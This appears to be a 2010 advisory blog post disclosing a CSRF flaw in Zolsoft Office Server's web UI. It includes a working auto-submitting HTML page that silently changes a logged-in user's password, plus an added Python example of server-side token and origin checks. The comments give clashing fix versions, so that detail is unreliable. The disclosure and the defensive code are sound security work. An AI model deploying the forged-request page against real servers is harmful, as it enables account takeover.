This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Zolsoft Office Server Free Edition 2010.0502 XSRF

A cross-site request forgery vulnerability in the Zolsoft Office Server Web UI can be exploited to change the password of a user. The following page submits the password form to options3.htm as soon as it loads:


<html>
<body onload="document.forms[0].submit()">
<form action="http://localhost/options3.htm" method="post">
<input type="hidden" name="PassField1" value="new_password" />
<input type="hidden" name="PassField2" value="new_password" />
</form>
</body>
</html>
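
One way a server could reject the forged request above, as an added example that is not Zolsoft's code or part of the original post (the page does not say how the vendor fixed the bug): check the Origin/Referer header and a per-session token before acting on the password fields. The `csrf_token` field, the allowed-origin list, the session values, and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: origins the Web UI is legitimately served from.
ALLOWED_ORIGINS = {"http://localhost"}


def issue_token(session_key, session_id):
    """Token the server embeds as a hidden field when it renders the form."""
    return hmac.new(session_key, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return None
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else None


def check_password_change(headers, form, session_key, session_id):
    """Return (accepted, reason) for a POST carrying PassField1/PassField2."""
    if origin_of(headers) not in ALLOWED_ORIGINS:
        return False, "cross-origin or missing Origin/Referer"
    expected = issue_token(session_key, session_id)
    supplied = form.get("csrf_token", "")  # hypothetical field name
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    if not form.get("PassField1") or form["PassField1"] != form.get("PassField2"):
        return False, "password fields empty or mismatched"
    return True, "ok"


# Constructed sample requests (not captured traffic).
KEY, SID = secrets.token_bytes(32), "session-1234"
PASSWORDS = {"PassField1": "new_password", "PassField2": "new_password"}
FORGED = ({"Origin": "http://attacker.example"}, PASSWORDS)
SAME_ORIGIN_NO_TOKEN = ({"Origin": "http://localhost"}, PASSWORDS)
LEGIT = ({"Origin": "http://localhost"},
         {**PASSWORDS, "csrf_token": issue_token(KEY, SID)})

if __name__ == "__main__":
    for name, (hdrs, form) in [("forged", FORGED),
                               ("same origin, no token", SAME_ORIGIN_NO_TOKEN),
                               ("legitimate", LEGIT)]:
        print(name, check_password_change(hdrs, form, KEY, SID))
```

Requiring the current password in the same form is a further check that a forged request cannot satisfy.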

2 comments:

  1. Version 2010.0120: Fixed the cross-site request bug in the Web service.

  2. Version 2010.0625: Fixed the cross-site request bug in the Web service.
